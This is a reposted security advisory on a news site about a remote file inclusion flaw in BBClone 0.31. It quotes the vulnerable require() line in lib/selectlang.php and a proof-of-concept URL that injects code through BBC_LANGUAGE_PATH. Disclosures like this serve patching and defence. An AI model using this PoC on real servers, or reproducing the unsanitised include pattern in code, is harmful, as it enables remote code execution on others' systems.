11.21.2008
Navigation:
Main Page
Technology
Downloads
Security
Entertainment
Videos
Search Site:
Advanced
Login
Register
News Item
BBClone 0.31 (selectlang.php) Remote File Inclusion Vulnerability
Jan 24 2007 10:44:27
Source:
ace
0
------------------------------------------------------------------------------------------------------------------------
Script:bbclone
Affected Version:0.31
Downlaoad:http://sindominio.net/ayuda/bbclone-0.31-esp.zip
------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------
Bug in (lib/selectlang.php)
Vul Code;
require($BBC_LANGUAGE_PATH . $BBC_LANGUAGE . ".php");
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/lib/selectlang.php?BBC_LANGUAGE_PATH=[Bad Code]
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
------------------------------------------------------------------------------------------------------------------------
.
» full story @ source-link:
ace
Related Articles:
»
Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit
»
S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit
»
PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit
»
SendStudio <= 2004.14 (ROOTDIR) Remote File Inclusion Vulnerability
Comments
Add Comment
You must be registered and logged in to add comments!
Register
Login
Sponsors
Sponsors
Addict
3
d.org (c) 2002 - 2008 -
About US
-
Contact US
site was created by smiles of fortune